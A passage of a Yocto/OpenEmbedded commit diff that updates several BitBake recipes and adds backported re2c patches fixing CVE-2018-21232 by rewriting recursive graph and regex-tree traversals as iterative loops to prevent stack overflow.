-inherit meson gettext pkgconfig gtk-doc bash-completion
+inherit meson gettext pkgconfig gtk-doc bash-completion manpages
DEPENDS = "libtasn1 libtasn1-native libffi"
DEPENDS_append = "${@' glib-2.0' if d.getVar('GTKDOC_ENABLED') == 'True' else ''}"
-SRC_URI = "git://github.com/p11-glue/p11-kit"
-SRCREV = "762cdaa2cd5c5ec09cc844f9a6bdc551c7f6c8ed"
+SRC_URI = "git://github.com/p11-glue/p11-kit;branch=0.23;protocol=https"
+SRCREV = "bd97afbfe28d5fbbde95ce36ff7a8834fc0291ee"
S = "${WORKDIR}/git"
PACKAGECONFIG ??= ""
+PACKAGECONFIG[manpages] = "-Dman=true,-Dman=false,libxslt-native"
PACKAGECONFIG[trust-paths] = "-Dtrust_paths=/etc/ssl/certs/ca-certificates.crt,,,ca-certificates"
GTKDOC_MESON_OPTION = 'gtk_doc'
diff --git a/meta/recipes-support/popt/popt_1.16.bb b/meta/recipes-support/popt/popt_1.16.bb
index 27e49c2ca2..0c0392d036 100644
--- a/meta/recipes-support/popt/popt_1.16.bb
+++ b/meta/recipes-support/popt/popt_1.16.bb
@@ -1,4 +1,5 @@
SUMMARY = "Library for parsing command line options"
+DESCRIPTION = "Popt is a C library for parsing command line parameters. Popt was heavily influenced by the getopt() and getopt_long() functions, but it improves on them by allowing more powerful argument expansion. Popt can parse arbitrary argv[] style arrays and automatically set variables based on command line arguments."
HOMEPAGE = "http://rpm5.org/"
SECTION = "libs"
diff --git a/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb b/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb
index 8b9938f572..3401b7b39e 100644
--- a/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb
+++ b/meta/recipes-support/ptest-runner/ptest-runner_2.4.0.bb
@@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=751419260aa954499f7abaabaa882bbe"
SRCREV = "834670317bd3f6e427e1ac461c07ada6b8936dfd"
PV .= "+git${SRCPV}"
-SRC_URI = "git://git.yoctoproject.org/ptest-runner2 \
+SRC_URI = "git://git.yoctoproject.org/ptest-runner2;branch=master \
"
UPSTREAM_VERSION_UNKNOWN = "1"
@@ -27,3 +27,5 @@ do_compile () {
do_install () {
install -D -m 0755 ${S}/ptest-runner ${D}${bindir}/ptest-runner
}
+
+RDEPENDS_${PN}_append_libc-glibc = " libgcc"
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch
new file mode 100644
index 0000000000..b7dcaefad3
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-1.patch
@@ -0,0 +1,347 @@
+From fd634998f813340768c333cdad638498602856e5 Mon Sep 17 00:00:00 2001
+From: Ulya Trofimovich <skvadrik@gmail.com>
+Date: Tue, 21 Apr 2020 21:28:32 +0100
+Subject: [PATCH] Rewrite recursion into iteration (Tarjan's SCC algorithm and
+ YYFILL states).
+
+This is to avoid stack overflow on large RE (especially on instrumented
+builds that have larger stack frames, like AddressSanitizer).
+
+Stack overflow reported by Agostino Sarubbo.
+Related to #219 "overflow-1.re test fails on system with small stack".
+
+Upstream-Status: Backport
+https://github.com/skvadrik/re2c/commit/fd634998f813340768c333cdad638498602856e5
+
+CVE: CVE-2018-21232
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/src/dfa/fillpoints.cc b/src/dfa/fillpoints.cc
+--- a/src/dfa/fillpoints.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/dfa/fillpoints.cc (date 1646929180243)
+@@ -5,151 +5,186 @@
+
+ #include "src/dfa/dfa.h"
+
+-namespace re2c
+-{
++
++/*
++ * note [finding strongly connected components of DFA]
++ *
++ * A slight modification of Tarjan's algorithm.
++ *
++ * The algorithm traverses the DFA in depth-first order. It maintains a stack
++ * of states that have already been visited but haven't been assigned to an SCC
++ * yet. For each state the algorithm calculates 'lowlink': index of the highest
++ * ancestor state reachable in one step from a descendant of this state.
++ * Lowlink is used to determine when a set of states should be popped off stack
++ * into a new SCC.
++ *
++ * We use lowlink to hold different kinds of information:
++ * - values in range [0 .. stack size] mean that the state is on stack (a
++ * link to a state with the smallest index reachable from this one)
++ * - SCC_UND means that this state has not been visited yet
++ * - SCC_INF means that this state has already been popped off stack
++ *
++ * We use stack size (rather than topological sort index) as a unique index of
++ * the state on stack. This is safe because the indices of states on stack are
++ * unique and less than the indices of states that have been popped off stack
++ * (SCC_INF).
++ */
++
++namespace re2c {
++ namespace {
+
+-static const size_t SCC_INF = std::numeric_limits<size_t>::max();
+-static const size_t SCC_UND = SCC_INF - 1;
++ static const size_t SCC_INF = std::numeric_limits<size_t>::max();
++ static const size_t SCC_UND = SCC_INF - 1;
+
+-static bool loopback(size_t node, size_t narcs, const size_t *arcs)
+-{
+- for (size_t i = 0; i < narcs; ++i)
+- {
+- if (arcs[i] == node)
+- {
+- return true;
+- }
+- }
+- return false;
+-}
++ static bool loopback(size_t state, size_t narcs, const size_t *arcs)
++ {
++ for (size_t i = 0; i < narcs; ++i) {
++ if (arcs[i] == state) return true;
++ }
++ return false;
++ }
+
+-/*
+- * node [finding strongly connected components of DFA]
+- *
+- * A slight modification of Tarjan's algorithm.
+- *
+- * The algorithm walks graph in deep-first order. It maintains a stack
+- * of nodes that have already been visited but haven't been assigned to
+- * SCC yet. For each node the algorithm calculates 'lowlink': index of
+- * the highest ancestor node reachable in one step from a descendant of
+- * the node. Lowlink is used to determine when a set of nodes should be
+- * popped off the stack into a new SCC.
+- *
+- * We use lowlink to hold different kinds of information:
+- * - values in range [0 .. stack size] mean that this node is on stack
+- * (link to a node with the smallest index reachable from this one)
+- * - SCC_UND means that this node has not been visited yet
+- * - SCC_INF means that this node has already been popped off stack
+- *
+- * We use stack size (rather than topological sort index) as unique index
+- * of a node on stack. This is safe because indices of nodes on stack are
+- * still unique and less than indices of nodes that have been popped off
+- * stack (SCC_INF).
+- *
+- */
+-static void scc(
+- const dfa_t &dfa,
+- std::stack<size_t> &stack,
+- std::vector<size_t> &lowlink,
+- std::vector<bool> &trivial,
+- size_t i)
+-{
+- const size_t link = stack.size();
+- lowlink[i] = link;
+- stack.push(i);
++ struct StackItem {
++ size_t state; // current state
++ size_t symbol; // next arc to be visited in this state
++ size_t link; // Tarjan's "lowlink"
++ };
++
++// Tarjan's algorithm
++ static void scc(const dfa_t &dfa, std::vector<bool> &trivial,
++ std::vector<StackItem> &stack_dfs)
++ {
++ std::vector<size_t> lowlink(dfa.states.size(), SCC_UND);
++ std::stack<size_t> stack;
++
++ StackItem x0 = {0, 0, 0};
++ stack_dfs.push_back(x0);
++
++ while (!stack_dfs.empty()) {
++ const size_t i = stack_dfs.back().state;
++ size_t c = stack_dfs.back().symbol;
++ size_t link = stack_dfs.back().link;
++ stack_dfs.pop_back();
++
++ const size_t *arcs = dfa.states[i]->arcs;
++
++ if (c == 0) {
++ // DFS recursive enter
++ //DASSERT(lowlink[i] == SCC_UND);
++ link = lowlink[i] = stack.size();
++ stack.push(i);
++ }
++ else {
++ // DFS recursive return (from one of successor states)
++ const size_t j = arcs[c - 1];
++ //DASSERT(lowlink[j] != SCC_UND);
++ lowlink[i] = std::min(lowlink[i], lowlink[j]);
++ }
+
+- const size_t *arcs = dfa.states[i]->arcs;
+- for (size_t c = 0; c < dfa.nchars; ++c)
+- {
+- const size_t j = arcs[c];
+- if (j != dfa_t::NIL)
+- {
+- if (lowlink[j] == SCC_UND)
+- {
+- scc(dfa, stack, lowlink, trivial, j);
+- }
+- if (lowlink[j] < lowlink[i])
+- {
+- lowlink[i] = lowlink[j];
+- }
+- }
+- }
++ // find the next successor state that hasn't been visited yet
++ for (; c < dfa.nchars; ++c) {
++ const size_t j = arcs[c];
++ if (j != dfa_t::NIL) {
++ if (lowlink[j] == SCC_UND) {
++ break;
++ }
++ lowlink[i] = std::min(lowlink[i], lowlink[j]);
++ }
++ }
+
+- if (lowlink[i] == link)
+- {
+- // SCC is non-trivial (has loops) iff it either:
+- // - consists of multiple nodes (they all must be interconnected)
+- // - consists of single node which loops back to itself
+- trivial[i] = i == stack.top()
+- && !loopback(i, dfa.nchars, arcs);
++ if (c < dfa.nchars) {
++ // recurse into the next successor state
++ StackItem x1 = {i, c + 1, link};
++ stack_dfs.push_back(x1);
++ StackItem x2 = {arcs[c], 0, SCC_UND};
++ stack_dfs.push_back(x2);
++ }
++ else if (lowlink[i] == link) {
++ // all successors have been visited
++ // SCC is non-trivial (has loops) if either:
++ // - it contains multiple interconnected states
++ // - it contains a single self-looping state
++ trivial[i] = i == stack.top() && !loopback(i, dfa.nchars, arcs);
+
+- size_t j;
+- do
+- {
+- j = stack.top();
+- stack.pop();
+- lowlink[j] = SCC_INF;
+- }
+- while (j != i);
+- }
+-}
++ for (;;) {
++ const size_t j = stack.top();
++ stack.pop();
++ lowlink[j] = SCC_INF;
++ if (i == j) break;
++ }
++ }
++ }
++ }
+
+-static void calc_fill(
+- const dfa_t &dfa,
+- const std::vector<bool> &trivial,
+- std::vector<size_t> &fill,
+- size_t i)
+-{
+- if (fill[i] == SCC_UND)
+- {
+- fill[i] = 0;
+- const size_t *arcs = dfa.states[i]->arcs;
+- for (size_t c = 0; c < dfa.nchars; ++c)
+- {
+- const size_t j = arcs[c];
+- if (j != dfa_t::NIL)
+- {
+- calc_fill(dfa, trivial, fill, j);
+- size_t max = 1;
+- if (trivial[j])
+- {
+- max += fill[j];
+- }
+- if (max > fill[i])
+- {
+- fill[i] = max;
+- }
+- }
+- }
+- }
+-}
+-
+-void fillpoints(const dfa_t &dfa, std::vector<size_t> &fill)
+-{
+- const size_t size = dfa.states.size();
+-
+- // find DFA states that belong to non-trivial SCC
+- std::stack<size_t> stack;
+- std::vector<size_t> lowlink(size, SCC_UND);
+- std::vector<bool> trivial(size, false);
+- scc(dfa, stack, lowlink, trivial, 0);
+-
+- // for each DFA state, calculate YYFILL argument:
+- // maximal path length to the next YYFILL state
+- fill.resize(size, SCC_UND);
+- calc_fill(dfa, trivial, fill, 0);
++ static void calc_fill(const dfa_t &dfa, const std::vector<bool> &trivial,
++ std::vector<StackItem> &stack_dfs, std::vector<size_t> &fill)
++ {
++ const size_t nstates = dfa.states.size();
++ fill.resize(nstates, SCC_UND);
++
++ StackItem x0 = {0, 0, SCC_INF};
++ stack_dfs.push_back(x0);
++
++ while (!stack_dfs.empty()) {
++ const size_t i = stack_dfs.back().state;
++ size_t c = stack_dfs.back().symbol;
++ stack_dfs.pop_back();
++
++ const size_t *arcs = dfa.states[i]->arcs;
++
++ if (c == 0) {
++ // DFS recursive enter
++ if (fill[i] != SCC_UND) continue;
++ fill[i] = 0;
++ }
++ else {
++ // DFS recursive return (from one of successor states)
++ const size_t j = arcs[c - 1];
++ //DASSERT(fill[i] != SCC_UND && fill[j] != SCC_UND);
++ fill[i] = std::max(fill[i], 1 + (trivial[j] ? fill[j] : 0));
++ }
++
++ // find the next successor state that hasn't been visited yet
++ for (; c < dfa.nchars; ++c) {
++ const size_t j = arcs[c];
++ if (j != dfa_t::NIL) break;
++ }
++
++ if (c < dfa.nchars) {
++ // recurse into the next successor state
++ StackItem x1 = {i, c + 1, SCC_INF};
++ stack_dfs.push_back(x1);
++ StackItem x2 = {arcs[c], 0, SCC_INF};
++ stack_dfs.push_back(x2);
++ }
++ }
+
+- // The following states must trigger YYFILL:
+- // - inital state
+- // - all states in non-trivial SCCs
+- // for other states, reset YYFILL argument to zero
+- for (size_t i = 1; i < size; ++i)
+- {
+- if (trivial[i])
+- {
+- fill[i] = 0;
+- }
+- }
+-}
++ // The following states must trigger YYFILL:
++ // - inital state
++ // - all states in non-trivial SCCs
++ // for other states, reset YYFILL argument to zero
++ for (size_t i = 1; i < nstates; ++i) {
++ if (trivial[i]) {
++ fill[i] = 0;
++ }
++ }
++ }
+
++ } // anonymous namespace
++
++ void fillpoints(const dfa_t &dfa, std::vector<size_t> &fill)
++ {
++ const size_t nstates = dfa.states.size();
++ std::vector<bool> trivial(nstates, false);
++ std::vector<StackItem> stack_dfs;
++ stack_dfs.reserve(nstates);
++
++ // find DFA states that belong to non-trivial SCC
++ scc(dfa, trivial, stack_dfs);
++
++ // for each DFA state, calculate YYFILL argument:
++ // maximal path length to the next YYFILL state
++ calc_fill(dfa, trivial, stack_dfs, fill);
++ }
++
+ } // namespace re2c
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch
new file mode 100644
index 0000000000..820a6decbc
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-2.patch
@@ -0,0 +1,243 @@
+From 7b5643476bd99c994c4f51b8143f942982d85521 Mon Sep 17 00:00:00 2001
+From: Ulya Trofimovich <skvadrik@gmail.com>
+Date: Wed, 22 Apr 2020 22:37:24 +0100
+Subject: [PATCH] Rewrite recursion into iteration (fixed tags computation).
+
+This is to avoid stack overflow on large RE (especially on instrumented
+builds that have larger stack frames, like AddressSanitizer).
+
+Partial fix for #219 "overflow-1.re test fails on system with small stack".
+
+Upstream-Status: Backport
+https://github.com/skvadrik/re2c/commit/7b5643476bd99c994c4f51b8143f942982d85521
+
+CVE: CVE-2018-21232
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/src/re/tag.cc b/src/re/tag.cc
+--- a/src/re/tag.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/re/tag.cc (date 1646986908580)
+@@ -6,7 +6,7 @@
+ {
+
+ const size_t Tag::RIGHTMOST = std::numeric_limits<size_t>::max();
+-const size_t Tag::VARDIST = std::numeric_limits<size_t>::max();
++const uint32_t Tag::VARDIST = std::numeric_limits<uint32_t>::max();
+ const size_t Tag::FICTIVE = Tag::RIGHTMOST - 1;
+
+ } // namespace re2c
+
+
+diff --git a/src/re/tag.h b/src/re/tag.h
+--- a/src/re/tag.h (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/re/tag.h (date 1646986922376)
+@@ -19,7 +19,7 @@
+ struct Tag
+ {
+ static const size_t RIGHTMOST;
+- static const size_t VARDIST;
++ static const uint32_t VARDIST;
+ static const size_t FICTIVE;
+
+ const std::string *name;
+
+
+diff --git a/src/re/fixed_tags.cc b/src/re/fixed_tags.cc
+--- a/src/re/fixed_tags.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/re/fixed_tags.cc (date 1646991137317)
+@@ -7,78 +7,131 @@
+ #include "src/re/tag.h"
+
+ namespace re2c {
++namespace {
+
+ /* note [fixed and variable tags]
+ *
+- * If distance between two tags is constant (equal for all strings that
+- * match the given regexp), then lexer only needs to track one of them:
+- * the second tag equals the first tag plus static offset.
++ * If distance between two tags is constant (equal for all strings that match
++ * the given regexp), then lexer only needs to track one of them: the second
++ * tag equals the first tag plus static offset.
+ *
+- * However, this optimization is applied only to tags in top-level
+- * concatenation, because other tags may be uninitialized and we don't
+- * want to mess with conditional calculation of fixed tags.
+- *
++ * This optimization is applied only to tags in top-level concatenation,
++ * because in other cases the base tag may be NULL, and the calculation of
++ * the fixed tag value is not as simple as subtracting a fixed offset.
+ * Furthermore, fixed tags are fobidden with generic API because it cannot
+- * express fixed offsets.
+- *
+- * Tags with history also cannot be fixed.
++ * express fixed offsets. M-tags (with history) also cannot be fixed.
+ *
+ * Another special case is fictive tags (those that exist only to impose
+- * hierarchical laws of POSIX disambiguation). We treat them as fixed
+- * in order to suppress code generation.
++ * hierarchical laws of POSIX disambiguation). We treat them as fixed in order
++ * to suppress code generation.
+ */
+
+-static void find_fixed_tags(RE *re, std::vector<Tag> &tags,
+- size_t &dist, size_t &base, bool toplevel)
++struct StackItem {
++ RE *re; // current sub-RE
++ uint32_t dist; // distance backup for alternative, unused for other RE
++ uint8_t succ; // index of the next successor to be visited
++ bool toplevel; // if this sub-RE is in top-level concatenation
++};
++
++static void find_fixed_tags(RESpec &spec, std::vector<StackItem> &stack, RE *re0)
+ {
+- switch (re->type) {
+- case RE::NIL: break;
+- case RE::SYM:
+- if (dist != Tag::VARDIST) ++dist;
+- break;
+- case RE::ALT: {
+- size_t d1 = dist, d2 = dist;
+- find_fixed_tags(re->alt.re1, tags, d1, base, false);
+- find_fixed_tags(re->alt.re2, tags, d2, base, false);
+- dist = (d1 == d2) ? d1 : Tag::VARDIST;
+- break;
+- }
+- case RE::CAT:
+- find_fixed_tags(re->cat.re2, tags, dist, base, toplevel);
+- find_fixed_tags(re->cat.re1, tags, dist, base, toplevel);
+- break;
+- case RE::ITER:
+- find_fixed_tags(re->iter.re, tags, dist, base, false);
+- dist = Tag::VARDIST;
+- break;
+- case RE::TAG: {
+- // see note [fixed and variable tags]
+- Tag &tag = tags[re->tag.idx];
+- if (fictive(tag)) {
+- tag.base = tag.dist = 0;
+- } else if (toplevel && dist != Tag::VARDIST && !history(tag)) {
+- tag.base = base;
+- tag.dist = dist;
+- } else if (toplevel) {
+- base = re->tag.idx;
+- dist = 0;
+- }
+- if (trailing(tag)) dist = 0;
+- break;
+- }
+- }
++ static const uint32_t VARDIST = Tag::VARDIST;
++ bool toplevel = spec.opts->input_api != INPUT_CUSTOM;
++
++ // base tag, initially the fake "rightmost tag" (the end of RE)
++ size_t base = Tag::RIGHTMOST;
++
++ // the distance to the nearest top-level tag to the right (base tag)
++ uint32_t dist = 0;
++
++ const StackItem i0 = {re0, VARDIST, 0, toplevel};
++ stack.push_back(i0);
++
++ while (!stack.empty()) {
++ const StackItem i = stack.back();
++ stack.pop_back();
++ RE *re = i.re;
++
++ if (re->type == RE::SYM) {
++ if (dist != VARDIST) ++dist;
++ }
++ else if (re->type == RE::ALT) {
++ if (i.succ == 0) {
++ // save the current distance on stack (from the alternative end
++ // to base) and recurse into the left sub-RE
++ StackItem k = {re, dist, 1, i.toplevel};
++ stack.push_back(k);
++ StackItem j = {re->alt.re1, VARDIST, 0, false};
++ stack.push_back(j);
++ }
++ else if (i.succ == 1) {
++ // save the current distance on stack (from the left sub-RE to
++ // base), reset distance to the distance popped from stack (from
++ // the alternative end to base), recurse into the right sub-RE
++ StackItem k = {re, dist, 2, i.toplevel};
++ stack.push_back(k);
++ StackItem j = {re->alt.re2, VARDIST, 0, false};
++ stack.push_back(j);
++ dist = i.dist;
++ }
++ else {
++ // both sub-RE visited, compare the distance on stack (from the
++ // left sub-RE to base) to the current distance (from the right
++ // sub-RE to base), if not equal set variable distance
++ dist = (i.dist == dist) ? i.dist : VARDIST;
++ }
++ }
++ else if (re->type == RE::ITER) {
++ if (i.succ == 0) {
++ // recurse into the sub-RE
++ StackItem k = {re, VARDIST, 1, i.toplevel};
++ stack.push_back(k);
++ StackItem j = {re->iter.re, VARDIST, 0, false};
++ stack.push_back(j);
++ }
++ else {
++ // sub-RE visited, assume unknown number of iterations
++ // TODO: find precise distance for fixed repetition counter
++ dist = VARDIST;
++ }
++ }
++ else if (re->type == RE::CAT) {
++ // the right sub-RE is pushed on stack after the left sub-RE and
++ // visited earlier (because distance is computed from right to left)
++ StackItem j1 = {re->cat.re1, VARDIST, 0, i.toplevel};
++ stack.push_back(j1);
++ StackItem j2 = {re->cat.re2, VARDIST, 0, i.toplevel};
++ stack.push_back(j2);
++ }
++ else if (re->type == RE::TAG) {
++ // see note [fixed and variable tags]
++ Tag &tag = spec.tags[re->tag.idx];
++ if (fictive(tag)) {
++ tag.base = tag.dist = 0;
++ }
++ else if (i.toplevel && dist != VARDIST && !history(tag)) {
++ tag.base = base;
++ tag.dist = dist;
++ }
++ else if (i.toplevel) {
++ base = re->tag.idx;
++ dist = 0;
++ }
++ if (trailing(tag)) {
++ dist = 0;
++ }
++ }
++ }
+ }
++
++} // anonymous namespace
+
+-void find_fixed_tags(RESpec &spec)
+-{
+- const bool generic = spec.opts->input_api == INPUT_CUSTOM;
+- std::vector<RE*>::iterator
+- i = spec.res.begin(),
+- e = spec.res.end();
+- for (; i != e; ++i) {
+- size_t base = Tag::RIGHTMOST, dist = 0;
+- find_fixed_tags(*i, spec.tags, dist, base, !generic);
+- }
+-}
++ void find_fixed_tags(RESpec &spec)
++ {
++ std::vector<StackItem> stack;
++ for (std::vector<RE*>::iterator i = spec.res.begin(); i != spec.res.end(); ++i) {
++ find_fixed_tags(spec, stack, *i);
++ }
++ }
+
+-} // namespace re2c
++} // namespace re2c
+\ No newline at end of file
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch
new file mode 100644
index 0000000000..f942e21cba
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-3.patch
@@ -0,0 +1,156 @@
+From 4d9c809355b574f2a58eac119f5e076c48e4d1e2 Mon Sep 17 00:00:00 2001
+From: Ulya Trofimovich <skvadrik@gmail.com>
+Date: Thu, 23 Apr 2020 22:16:51 +0100
+Subject: [PATCH] Rewrite recursion into iteration (nullable RE).
+
+This is to avoid stack overflow on large RE (especially on instrumented
+builds that have larger stack frames, like AddressSanitizer).
+
+Partial fix for #219 "overflow-1.re test fails on system with small stack".
+
+Upstream-Status: Backport:
+https://github.com/skvadrik/re2c/commit/4d9c809355b574f2a58eac119f5e076c48e4d1e2
+
+CVE: CVE-2018-21232
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/src/re/nullable.cc b/src/re/nullable.cc
+--- a/src/re/nullable.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/re/nullable.cc (date 1647253886226)
+@@ -9,43 +9,100 @@
+ #include "src/re/tag.h"
+
+ namespace re2c {
++ namespace {
++
++ struct StackItem {
++ const RE *re; // current sub-RE
++ uint8_t succ; // index of the next successor to be visited
++ };
+
+-static bool nullable(const RESpec &spec, const RE *re, bool &trail)
+-{
+- if (trail) return true;
++ static bool nullable(const RESpec &spec, std::vector<StackItem> &stack, const RE *re0)
++ {
++ // the "nullable" status of the last sub-RE visited by DFS
++ bool null = false;
+
+- switch (re->type) {
+- case RE::NIL: return true;
+- case RE::SYM: return false;
+- case RE::ITER:
+- return nullable(spec, re->iter.re, trail);
+- case RE::TAG:
+- trail |= trailing(spec.tags[re->tag.idx]);
+- return true;
+- case RE::ALT:
+- return nullable(spec, re->alt.re1, trail)
+- || nullable(spec, re->alt.re2, trail);
+- case RE::CAT:
+- return nullable(spec, re->cat.re1, trail)
+- && nullable(spec, re->cat.re2, trail);
+- }
+- return false; /* unreachable */
+-}
++ const StackItem i0 = {re0, 0};
++ stack.push_back(i0);
++
++ while (!stack.empty()) {
++ const StackItem i = stack.back();
++ stack.pop_back();
++
++ const RE *re = i.re;
++ if (re->type == RE::NIL) {
++ null = true;
++ }
++ else if (re->type == RE::SYM) {
++ null = false;
++ }
++ else if (re->type == RE::TAG) {
++ null = true;
+
+-/*
+- * warn about rules that match empty string
+- * (including rules with nonempty trailing context)
+- * false positives on partially self-shadowed rules like [^]?
+- */
+-void warn_nullable(const RESpec &spec, const std::string &cond)
+-{
+- const size_t nre = spec.res.size();
+- for (size_t i = 0; i < nre; ++i) {
+- bool trail = false;
+- if (nullable(spec, spec.res[i], trail)) {
+- spec.warn.match_empty_string(spec.rules[i].code->fline, cond);
+- }
+- }
+-}
++ // Trailing context is always in top-level concatenation, and sub-RE
++ // are visited from left to right. Since we are here, sub-RE to the
++ // left of the trailing context is nullable (otherwise we would not
++ // recurse into the right sub-RE), therefore the whole RE is nullable.
++ if (trailing(spec.tags[re->tag.idx])) {
++ //DASSERT(stack.size() == 1 && stack.back().re->type == RE::CAT);
++ stack.pop_back();
++ break;
++ }
++ }
++ else if (re->type == RE::ALT) {
++ if (i.succ == 0) {
++ // recurse into the left sub-RE
++ StackItem k = {re, 1};
++ stack.push_back(k);
++ StackItem j = {re->alt.re1, 0};
++ stack.push_back(j);
++ }
++ else if (!null) {
++ // if the left sub-RE is nullable, so is alternative, so stop
++ // recursion; otherwise recurse into the right sub-RE
++ StackItem j = {re->alt.re2, 0};
++ stack.push_back(j);
++ }
++ }
++ else if (re->type == RE::CAT) {
++ if (i.succ == 0) {
++ // recurse into the left sub-RE
++ StackItem k = {re, 1};
++ stack.push_back(k);
++ StackItem j = {re->cat.re1, 0};
++ stack.push_back(j);
++ }
++ else if (null) {
++ // if the left sub-RE is not nullable, neither is concatenation,
++ // so stop recursion; otherwise recurse into the right sub-RE
++ StackItem j = {re->cat.re2, 0};
++ stack.push_back(j);
++ }
++ }
++ else if (re->type == RE::ITER) {
++ // iteration is nullable if the sub-RE is nullable
++ // (zero repetitions is represented with alternative)
++ StackItem j = {re->iter.re, 0};
++ stack.push_back(j);
++ }
++ }
++
++ //DASSERT(stack.empty());
++ return null;
++ }
++
++ } // anonymous namespace
++
++// Warn about rules that match empty string (including rules with nonempty
++// trailing context). False positives on partially self-shadowed rules like [^]?
++ void warn_nullable(const RESpec &spec, const std::string &cond)
++ {
++ std::vector<StackItem> stack;
++ const size_t nre = spec.res.size();
++ for (size_t i = 0; i < nre; ++i) {
++ if (nullable(spec, stack, spec.res[i])) {
++ spec.warn.match_empty_string(spec.rules[i].code->fline, cond);
++ }
++ }
++ }
+
+ } // namespace re2c
diff --git a/meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch b/meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch
new file mode 100644
index 0000000000..ee8d84b1bc
--- /dev/null
+++ b/meta/recipes-support/re2c/re2c/CVE-2018-21232-4.patch
@@ -0,0 +1,166 @@
+From 89be91f3df00657261870adbc590209fdb2bc405 Mon Sep 17 00:00:00 2001
+From: Ulya Trofimovich <skvadrik@gmail.com>
+Date: Thu, 23 Apr 2020 23:02:21 +0100
+Subject: [PATCH] Rewrite recursion into iteration (estimation of NFA size for
+ RE).
+
+This is to avoid stack overflow on large RE (especially on instrumented
+builds that have larger stack frames, like AddressSanitizer).
+
+Partial fix for #219 "overflow-1.re test fails on system with small stack".
+
+Upstream-Status: Backport:
+https://github.com/skvadrik/re2c/commit/89be91f3df00657261870adbc590209fdb2bc405
+
+CVE: CVE-2018-21232
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+diff --git a/src/nfa/estimate_size.cc b/src/nfa/estimate_size.cc
+--- a/src/nfa/estimate_size.cc (revision e58939b34bb4c37cd990f82dc286f21cb405743e)
++++ b/src/nfa/estimate_size.cc (date 1647005399735)
+@@ -6,41 +6,113 @@
+ #include "src/re/re.h"
+
+ namespace re2c {
++namespace {
++
++struct StackItem {
++ const RE *re; // current sub-RE
++ uint32_t size; // size of the sub-RE (only for alternative and concatenation)
++ uint8_t succ; // index of the next successor to be visited
++};
+
+-static size_t estimate(const RE *re)
++static uint32_t estimate_re_size(const RE *re0, std::vector<StackItem> &stack)
+ {
+- switch (re->type) {
+- case RE::NIL: return 0;
+- case RE::SYM: return 1;
+- case RE::TAG: return 1;
+- case RE::ALT:
+- return estimate(re->alt.re1)
+- + estimate(re->alt.re2)
+- + 1;
+- case RE::CAT:
+- return estimate(re->cat.re1)
+- + estimate(re->cat.re2);
+- case RE::ITER: {
+- const size_t
+- iter = estimate(re->iter.re),
+- min = re->iter.min,
+- max = re->iter.max;
+- return max == AST::MANY
+- ? iter * min + 1
+- : iter * max + (max - min);
+- }
+- }
+- return 0; /* unreachable */
+-}
++ // the estimated size of the last sub-RE visited by DFS
++ uint32_t size = 0;
++
++ const StackItem i0 = {re0, 0, 0};
++ stack.push_back(i0);
++
++ while (!stack.empty()) {
++ const StackItem i = stack.back();
++ stack.pop_back();
++
++ const RE *re = i.re;
++ if (re->type == RE::NIL) {
++ size = 0;
++ }
++ else if (re->type == RE::SYM || re->type == RE::TAG) {
++ size = 1;
++ }
++ else if (re->type == RE::ALT) {
++ if (i.succ == 0) {
++ // recurse into the left sub-RE
++ StackItem k = {re, 0, 1};
++ stack.push_back(k);
++ StackItem j = {re->alt.re1, 0, 0};
++ stack.push_back(j);
++ }
++ else if (i.succ == 1) {
++ // recurse into the right sub-RE
++ StackItem k = {re, size, 2};
++ stack.push_back(k);
++ StackItem j = {re->alt.re2, 0, 0};
++ stack.push_back(j);
++ }
++ else {
++ // both sub-RE visited, recursive return
++ size = i.size // left sub-RE (saved on stack)
++ + size // right sub-RE (just visited by DFS)
++ + 1; // additional state for alternative
++ }
++ }
++ else if (re->type == RE::CAT) {
++ if (i.succ == 0) {
++ // recurse into the left sub-RE
++ StackItem k = {re, 0, 1};
++ stack.push_back(k);
++ StackItem j = {re->cat.re1, 0, 0};
++ stack.push_back(j);
++ }
++ else if (i.succ == 1) {
++ // recurse into the right sub-RE
++ StackItem k = {re, size, 2};
++ stack.push_back(k);
++ StackItem j = {re->cat.re2, 0, 0};
++ stack.push_back(j);
++ }
++ else {
++ // both sub-RE visited, recursive return
++ size = i.size // left sub-RE (saved on stack)
++ + size; // right sub-RE (just visited by DFS)
++ }
++ }
++ else if (re->type == RE::ITER) {
++ if (i.succ == 0) {
++ // recurse into the sub-RE
++ StackItem k = {re, 0, 1};
++ stack.push_back(k);
++ StackItem j = {re->iter.re, 0, 0};
++ stack.push_back(j);
++ }
++ else {
++ // sub-RE visited, recursive return
++ const uint32_t min = re->iter.min, max = re->iter.max;
++ size = max == AST::MANY
++ ? size * min + 1
++ : size * max + (max - min);
++ }
++ }
++ }
++
++ //DASSERT(stack.empty());
++ return size;
++}
++
++} // anonymous namespace
+
+ size_t estimate_size(const std::vector<RE*> &res)
+ {
+- const size_t nre = res.size();
+- size_t size = nre - 1;
+- for (size_t i = 0; i < nre; ++i) {
+- size += estimate(res[i]) + 1;
+- }
+- return size;
++ std::vector<StackItem> stack;
++
